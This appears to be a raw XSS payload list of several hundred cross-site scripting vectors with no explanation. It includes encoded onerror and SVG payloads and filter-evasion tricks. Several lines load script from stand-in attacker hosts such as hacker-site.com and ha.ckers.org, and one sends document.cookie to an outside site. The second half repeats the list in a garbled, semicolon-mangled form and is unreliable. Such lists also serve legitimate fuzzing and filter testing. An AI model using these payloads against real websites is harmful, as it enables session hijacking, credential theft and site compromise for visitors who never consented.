<img src="Mario Heiderich says that svg SHOULD not be executed trough image tags" onerror="javascript:document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0064\u0061\u0074\u0061\u003a\u0069\u006d\u0061\u0067\u0065\u002f\u0073\u0076\u0067\u002b\u0078\u006d\u006c\u003b\u0062\u0061\u0073\u0065\u0036\u0034\u002c\u0050\u0048\u004e\u0032\u005a\u0079\u0042\u0034\u0062\u0057\u0078\u0075\u0063\u007a\u0030\u0069\u0061\u0048\u0052\u0030\u0063\u0044\u006f\u0076\u004c\u0033\u0064\u0033\u0064\u0079\u0035\u0033\u004d\u0079\u0035\u0076\u0063\u006d\u0063\u0076\u004d\u006a\u0041\u0077\u004d\u0043\u0039\u007a\u0064\u006d\u0063\u0069\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u0070\u0062\u0057\u0046\u006e\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0045\u0070\u0049\u006a\u0034\u0038\u004c\u0032\u006c\u0074\u0059\u0057\u0064\u006c\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u007a\u0064\u006d\u0063\u0067\u0062\u0032\u0035\u0073\u0062\u0032\u0046\u006b\u0050\u0053\u004a\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u0079\u004b\u0053\u0049\u002b\u0050\u0043\u0039\u007a\u0064\u006d\u0063\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0048\u004e\u006a\u0063\u006d\u006c\u0077\u0064\u0044\u0035\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u007a\u004b\u0054\u0077\u0076\u0063\u0032\u004e\u0079\u0061\u0058\u0042\u0030\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u006b\u005a\u0057\u005a\u007a\u0049\u0047\u0039\u0075\u0062\u0047\u0039\u0068\u005a\u0044\u0030\u0069\u0059\u0057\u0078\u006c\u0063\u006e\u0051\u006f\u004e\u0043\u006b\u0069\u0050\u006a\u0077\u0076\u005a\u0047\u0056\u006d\u0063\u007a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0038\u005a\u0079\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u00
55\u0070\u0049\u006a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0067\u0050\u0047\u004e\u0070\u0063\u006d\u004e\u0073\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0059\u0070\u0049\u0069\u0041\u0076\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0038\u0064\u0047\u0056\u0034\u0064\u0043\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0063\u0070\u0049\u006a\u0034\u0038\u004c\u0033\u0052\u006c\u0065\u0048\u0051\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0043\u0039\u006e\u0050\u0069\u0041\u0067\u0043\u006a\u0077\u0076\u0063\u0033\u005a\u006e\u0050\u0069\u0041\u0067\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');"></img> | |
</body> | |
</html> | |
<SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT> | |
<SCRIPT> alert(“XSS”); </SCRIPT> | |
<BODY ONLOAD=alert("XSS")> | |
<BODY BACKGROUND="javascript:alert('XSS')"> | |
<IMG SRC="javascript:alert('XSS');"> | |
<IMG DYNSRC="javascript:alert('XSS')"> | |
<IMG LOWSRC="javascript:alert('XSS')"> | |
<IFRAME SRC=”http://hacker-site.com/xss.html”> | |
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> | |
<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> | |
<TABLE BACKGROUND="javascript:alert('XSS')"> | |
<TD BACKGROUND="javascript:alert('XSS')"> | |
<DIV STYLE="background-image: url(javascript:alert('XSS'))"> | |
<DIV STYLE="width: expression(alert('XSS'));"> | |
<OBJECT TYPE="text/x-scriptlet" DATA="http://hacker.com/xss.html"> | |
<EMBED SRC="http://hacker.com/xss.swf" AllowScriptAccess="always"> | |
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
'';!--"<XSS>=&{()} | |
<SCRIPT>alert('XSS')</SCRIPT> | |
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
<BASE HREF="javascript:alert('XSS');//"> | |
<BGSOUND SRC="javascript:alert('XSS');"> | |
<BODY BACKGROUND="javascript:alert('XSS');"> | |
<BODY ONLOAD=alert('XSS')> | |
<DIV STYLE="background-image: url(javascript:alert('XSS'))"> | |
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> | |
<DIV STYLE="width: expression(alert('XSS'));"> | |
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> | |
<IFRAME SRC="javascript:alert('XSS');"></IFRAME> | |
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> | |
<IMG SRC="javascript:alert('XSS');"> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG DYNSRC="javascript:alert('XSS');"> | |
<IMG LOWSRC="javascript:alert('XSS');"> | |
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> | |
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser | |
exp/*<XSS STYLE='no\xss:noxss("*//*"); | |
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS | |
<IMG SRC='vbscript:msgbox("XSS")'> | |
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> | |
<IMG SRC="livescript:[code]"> | |
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE | |
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> | |
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> | |
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> | |
<IMG SRC="mocha:[code]"> | |
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> | |
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> | |
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> | |
a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")"; eval(a+b+c+d); | |
<STYLE TYPE="text/javascript">alert('XSS');</STYLE> | |
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> | |
<XSS STYLE="xss:expression(alert('XSS'))"> | |
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> | |
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> | |
<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> | |
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> | |
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> | |
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> | |
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> | |
<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE> | |
<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE> | |
<HTML xmlns:xss> | |
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> | |
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML> | |
<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML> | |
<HTML><BODY> | |
<!--[if gte IE 4]> | |
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> | |
<XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);"> | |
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> | |
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"--> | |
<? echo('<SCR)'; | |
<BR SIZE="&{alert('XSS')}"> | |
<IMG SRC=JaVaScRiPt:alert('XSS')> | |
<IMG SRC=javascript:alert(&quot;XSS&quot;)> | |
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> | |
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> | |
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> | |
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> | |
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> | |
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> | |
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- | |
\";alert('XSS');// | |
</TITLE><SCRIPT>alert("XSS");</SCRIPT> | |
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> | |
<IMG SRC="jav	ascript:alert('XSS');"> | |
<IMG SRC="jav&#x09;ascript:alert('XSS');"> | |
<IMG SRC="jav&#x0A;ascript:alert('XSS');"> | |
<IMG SRC="jav&#x0D;ascript:alert('XSS');"> | |
<IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>
 | |
perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out | |
perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out | |
<IMG SRC=" &#14; javascript:alert('XSS');"> | |
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> | |
<SCRIPT SRC=http://ha.ckers.org/xss.js | |
<SCRIPT SRC=//ha.ckers.org/.j> | |
<IMG SRC="javascript:alert('XSS')" | |
<IFRAME SRC=http://ha.ckers.org/scriptlet.html < | |
<<SCRIPT>alert("XSS");//<</SCRIPT> | |
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> | |
<SCRIPT>a=/XSS/ | |
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<A HREF="http://66.102.7.147/">XSS</A> | |
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> | |
<A HREF="http://1113982867/">XSS</A> | |
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> | |
<A HREF="http://0102.0146.0007.00000223/">XSS</A> | |
<A HREF="h
tt	p://6&#09;6.000146.0x7.147/">XSS</A> | |
<A HREF="//www.google.com/">XSS</A> | |
<A HREF="//google">XSS</A> | |
<A HREF="http://ha.ckers.org@google">XSS</A> | |
<A HREF="http://google:ha.ckers.org">XSS</A> | |
<A HREF="http://google.com/">XSS</A> | |
<A HREF="http://www.google.com./">XSS</A> | |
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A> | |
<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A> | |
<script>document.vulnerable=true;</script> | |
<img SRC="jav ascript:document.vulnerable=true;"> | |
<img SRC="javascript:document.vulnerable=true;"> | |
<img SRC="  javascript:document.vulnerable=true;"> | |
<body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;> | |
<<SCRIPT>document.vulnerable=true;//<</SCRIPT> | |
<script <B>document.vulnerable=true;</script> | |
<img SRC="javascript:document.vulnerable=true;" | |
<iframe src="javascript:document.vulnerable=true; < | |
<script>a=/XSS/\ndocument.vulnerable=true;</script> | |
\";document.vulnerable=true;;// | |
</title><SCRIPT>document.vulnerable=true;</script> | |
<input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;"> | |
<body BACKGROUND="javascript:document.vulnerable=true;"> | |
<body ONLOAD=document.vulnerable=true;> | |
<img DYNSRC="javascript:document.vulnerable=true;"> | |
<img LOWSRC="javascript:document.vulnerable=true;"> | |
<bgsound SRC="javascript:document.vulnerable=true;"> | |
<br SIZE="&{document.vulnerable=true}"> | |
<LAYER SRC="javascript:document.vulnerable=true;"></LAYER> | |
<link REL="stylesheet" HREF="javascript:document.vulnerable=true;"> | |
<style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS | |
<img SRC='vbscript:document.vulnerable=true;'> | |
1script3document.vulnerable=true;1/script3 | |
<meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;"> | |
<meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;"> | |
<IFRAME SRC="javascript:document.vulnerable=true;"></iframe> | |
<FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset> | |
<table BACKGROUND="javascript:document.vulnerable=true;"> | |
<table><TD BACKGROUND="javascript:document.vulnerable=true;"> | |
<div STYLE="background-image: url(javascript:document.vulnerable=true;)"> | |
<div STYLE="background-image: url(javascript:document.vulnerable=true;)"> | |
<div STYLE="width: expression(document.vulnerable=true);"> | |
<style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style> | |
<img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)"> | |
<XSS STYLE="xss:expression(document.vulnerable=true)"> | |
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'> | |
<style TYPE="text/javascript">document.vulnerable=true;</style> | |
<style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a> | |
<style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</style> | |
<!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]--> | |
<base HREF="javascript:document.vulnerable=true;//"> | |
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object> | |
<XML ID=I><X><C><![<IMG SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span> | |
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span> | |
<html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html> | |
<? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?> | |
<meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>"> | |
<head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4- | |
<a href="javascript#document.vulnerable=true;"> | |
<div onmouseover="document.vulnerable=true;"> | |
<img src="javascript:document.vulnerable=true;"> | |
<img dynsrc="javascript:document.vulnerable=true;"> | |
<input type="image" dynsrc="javascript:document.vulnerable=true;"> | |
<bgsound src="javascript:document.vulnerable=true;"> | |
&<script>document.vulnerable=true;</script> | |
&{document.vulnerable=true;}; | |
<img src=&{document.vulnerable=true;};> | |
<link rel="stylesheet" href="javascript:document.vulnerable=true;"> | |
<iframe src="vbscript:document.vulnerable=true;"> | |
<img src="mocha:document.vulnerable=true;"> | |
<img src="livescript:document.vulnerable=true;"> | |
<a href="about:<script>document.vulnerable=true;</script>"> | |
<meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;"> | |
<body onload="document.vulnerable=true;"> | |
<div style="background-image: url(javascript:document.vulnerable=true;);"> | |
<div style="behaviour: url([link to code]);"> | |
<div style="binding: url([link to code]);"> | |
<div style="width: expression(document.vulnerable=true;);"> | |
<style type="text/javascript">document.vulnerable=true;</style> | |
<object classid="clsid:..." codebase="javascript:document.vulnerable=true;"> | |
<style><!--</style><script>document.vulnerable=true;//--></script> | |
<<script>document.vulnerable=true;</script> | |
<![<!--]]<script>document.vulnerable=true;//--></script> | |
<!-- -- --><script>document.vulnerable=true;</script><!-- -- --> | |
<img src="blah"onmouseover="document.vulnerable=true;"> | |
<img src="blah>" onmouseover="document.vulnerable=true;"> | |
<xml src="javascript:document.vulnerable=true;"> | |
<xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml> | |
<div datafld="b" dataformatas="html" datasrc="#X"></div> | |
[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script> | |
<style>@import'http://www.securitycompass.com/xss.css';</style> | |
<meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet"> | |
<style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style> | |
<OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object> | |
<HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html> | |
<script SRC="http://www.securitycompass.com/xss.jpg"></script> | |
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"--> | |
<script a=">" SRC="http://www.securitycompass.com/xss.js"></script> | |
<script =">" SRC="http://www.securitycompass.com/xss.js"></script> | |
<script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script> | |
<script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script> | |
<script a=`>` SRC="http://www.securitycompass.com/xss.js"></script> | |
<script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script> | |
<script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script> | |
<div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla] | |
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> | |
</script><script>alert(1)</script> | |
</br style=a:expression(alert())> | |
<scrscriptipt>alert(1)</scrscriptipt> | |
<br size=\"&{alert('XSS')}\"> | |
perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out | |
perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out | |
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> | |
<~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)> | |
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> | |
<~/XSS STYLE=xss:expression(alert('XSS'))> | |
"><script>alert('XSS')</script> | |
</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> | |
XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> | |
XSS STYLE=xss:e/**/xpression(alert('XSS'))> | |
</XSS STYLE=xss:expression(alert('XSS'))> | |
';;alert(String.fromCharCode(88,83,83))//\';;alert(String.fromCharCode(88,83,83))//";;alert(String.fromCharCode(88,83,83))//\";;alert(String.fromCharCode(88,83,83))//-->;<;/SCRIPT>;";>;';>;<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>; | |
';';;!--";<;XSS>;=&;{()} | |
<;SCRIPT>;alert(';XSS';)<;/SCRIPT>; | |
<;SCRIPT SRC=http://ha.ckers.org/xss.js>;<;/SCRIPT>; | |
<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>; | |
<;BASE HREF=";javascript:alert(';XSS';);//";>; | |
<;BGSOUND SRC=";javascript:alert(';XSS';);";>; | |
<;BODY BACKGROUND=";javascript:alert(';XSS';);";>; | |
<;BODY ONLOAD=alert(';XSS';)>; | |
<;DIV STYLE=";background-image: url(javascript:alert(';XSS';))";>; | |
<;DIV STYLE=";background-image: url(&;#1;javascript:alert(';XSS';))";>; | |
<;DIV STYLE=";width: expression(alert(';XSS';));";>; | |
<;FRAMESET>;<;FRAME SRC=";javascript:alert(';XSS';);";>;<;/FRAMESET>; | |
<;IFRAME SRC=";javascript:alert(';XSS';);";>;<;/IFRAME>; | |
<;INPUT TYPE=";IMAGE"; SRC=";javascript:alert(';XSS';);";>; | |
<;IMG SRC=";javascript:alert(';XSS';);";>; | |
<;IMG SRC=javascript:alert(';XSS';)>; | |
<;IMG DYNSRC=";javascript:alert(';XSS';);";>; | |
<;IMG LOWSRC=";javascript:alert(';XSS';);";>; | |
<;IMG SRC=";http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode";>; | |
Redirect 302 /a.jpg http://victimsite.com/admin.asp&;deleteuser | |
exp/*<;XSS STYLE=';no\xss:noxss(";*//*";); | |
<;STYLE>;li {list-style-image: url(";javascript:alert('XSS')";);}<;/STYLE>;<;UL>;<;LI>;XSS | |
<;IMG SRC=';vbscript:msgbox(";XSS";)';>; | |
<;LAYER SRC=";http://ha.ckers.org/scriptlet.html";>;<;/LAYER>; | |
<;IMG SRC=";livescript:[code]";>; | |
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE | |
<;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=javascript:alert(';XSS';);";>; | |
<;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K";>; | |
<;META HTTP-EQUIV=";refresh"; CONTENT=";0; URL=http://;URL=javascript:alert(';XSS';);";>; | |
<;IMG SRC=";mocha:[code]";>; | |
<;OBJECT TYPE=";text/x-scriptlet"; DATA=";http://ha.ckers.org/scriptlet.html";>;<;/OBJECT>; | |
<;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>;<;param name=url value=javascript:alert(';XSS';)>;<;/OBJECT>; | |
<;EMBED SRC=";http://ha.ckers.org/xss.swf"; AllowScriptAccess=";always";>;<;/EMBED>; | |
a=";get";;&;#10;b=";URL(";";;&;#10;c=";javascript:";;&;#10;d=";alert(';XSS';);";)";; eval(a+b+c+d); | |
<;STYLE TYPE=";text/javascript";>;alert(';XSS';);<;/STYLE>; | |
<;IMG STYLE=";xss:expr/*XSS*/ession(alert(';XSS';))";>; | |
<;XSS STYLE=";xss:expression(alert(';XSS';))";>; | |
<;STYLE>;.XSS{background-image:url(";javascript:alert(';XSS';)";);}<;/STYLE>;<;A CLASS=XSS>;<;/A>; | |
<;STYLE type=";text/css";>;BODY{background:url(";javascript:alert(';XSS';)";)}<;/STYLE>; | |
<;LINK REL=";stylesheet"; HREF=";javascript:alert(';XSS';);";>; | |
<;LINK REL=";stylesheet"; HREF=";http://ha.ckers.org/xss.css";>; | |
<;STYLE>;@import';http://ha.ckers.org/xss.css';;<;/STYLE>; | |
<;META HTTP-EQUIV=";Link"; Content=";<;http://ha.ckers.org/xss.css>;; REL=stylesheet";>; | |
<;STYLE>;BODY{-moz-binding:url(";http://ha.ckers.org/xssmoz.xml#xss";)}<;/STYLE>; | |
<;TABLE BACKGROUND=";javascript:alert(';XSS';)";>;<;/TABLE>; | |
<;TABLE>;<;TD BACKGROUND=";javascript:alert(';XSS';)";>;<;/TD>;<;/TABLE>; | |
<;HTML xmlns:xss>; | |
<;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=";javas]]>;<;![CDATA[cript:alert(';XSS';);";>;]]>; | |
<;XML ID=";xss";>;<;I>;<;B>;<;IMG SRC=";javas<;!-- -->;cript:alert(';XSS';)";>;<;/B>;<;/I>;<;/XML>; | |
<;XML SRC=";http://ha.ckers.org/xsstest.xml"; ID=I>;<;/XML>; | |
<;HTML>;<;BODY>; | |
<;!--[if gte IE 4]>; | |
<;META HTTP-EQUIV=";Set-Cookie"; Content=";USERID=<;SCRIPT>;alert(';XSS';)<;/SCRIPT>;";>; | |
<;XSS STYLE=";behavior: url(http://ha.ckers.org/xss.htc);";>; | |
<;SCRIPT SRC=";http://ha.ckers.org/xss.jpg";>;<;/SCRIPT>; | |
<;!--#exec cmd=";/bin/echo ';<;SCRIPT SRC';";-->;<;!--#exec cmd=";/bin/echo ';=http://ha.ckers.org/xss.js>;<;/SCRIPT>;';";-->; | |
<;? echo(';<;SCR)';; | |
<;BR SIZE=";&;{alert(';XSS';)}";>; | |
<;IMG SRC=JaVaScRiPt:alert(';XSS';)>; | |
<;IMG SRC=javascript:alert(&;quot;XSS&;quot;)>; | |
<;IMG SRC=`javascript:alert(";RSnake says, ';XSS';";)`>; | |
<;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>; | |
<;IMG RC=&;#106;&;#97;&;#118;&;#97;&;#115;&;#99;&;#114;&;#105;&;#112;&;#116;&;#58;&;#97;&;#108;&;#101;&;#114;&;#116;&;#40;&;#39;&;#88;&;#83;&;#83;&;#39;&;#41;>; | |
<;IMG RC=&;#0000106&;#0000097&;#0000118&;#0000097&;#0000115&;#0000099&;#0000114&;#0000105&;#0000112&;#0000116&;#0000058&;#0000097&;#0000108&;#0000101&;#0000114&;#0000116&;#0000040&;#0000039&;#0000088&;#0000083&;#0000083&;#0000039&;#0000041>; | |
<;DIV STYLE=";background-image:\0075\0072\006C\0028';\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.10530053\0027\0029';\0029";>; | |
<;IMG SRC=&;#x6A&;#x61&;#x76&;#x61&;#x73&;#x63&;#x72&;#x69&;#x70&;#x74&;#x3A&;#x61&;#x6C&;#x65&;#x72&;#x74&;#x28&;#x27&;#x58&;#x53&;#x53&;#x27&;#x29>; | |
<;HEAD>;<;META HTTP-EQUIV=";CONTENT-TYPE"; CONTENT=";text/html; charset=UTF-7";>; <;/HEAD>;+ADw-SCRIPT+AD4-alert(';XSS';);+ADw-/SCRIPT+AD4- | |
\";;alert(';XSS';);// | |
<;/TITLE>;<;SCRIPT>;alert("XSS");<;/SCRIPT>; | |
<;STYLE>;@im\port';\ja\vasc\ript:alert(";XSS";)';;<;/STYLE>; | |
<;IMG SRC=";jav	ascript:alert(';XSS';);";>; | |
<;IMG SRC=";jav&;#x09;ascript:alert(';XSS';);";>; | |
<;IMG SRC=";jav&;#x0A;ascript:alert(';XSS';);";>; | |
<;IMG SRC=";jav&;#x0D;ascript:alert(';XSS';);";>; | |
<;IMG
SRC
=
";
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t

';
X
S
S
';
)
";
>;
 | |
perl -e ';print ";<;IM SRC=java\0script:alert(";XSS";)>";;';>; out | |
perl -e ';print ";&;<;SCR\0IPT>;alert(";XSS";)<;/SCR\0IPT>;";;'; >; out | |
<;IMG SRC="; &;#14; javascript:alert(';XSS';);";>; | |
<;SCRIPT/XSS SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; | |
<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>; | |
<;SCRIPT SRC=http://ha.ckers.org/xss.js | |
<;SCRIPT SRC=//ha.ckers.org/.j>; | |
<;IMG SRC=";javascript:alert(';XSS';)"; | |
<;IFRAME SRC=http://ha.ckers.org/scriptlet.html <; | |
<;<;SCRIPT>;alert(";XSS";);//<;<;/SCRIPT>; | |
<;IMG ";";";>;<;SCRIPT>;alert(";XSS";)<;/SCRIPT>;";>; | |
<;SCRIPT>;a=/XSS/ | |
<;SCRIPT a=";>;"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; | |
<;SCRIPT =";blah"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; | |
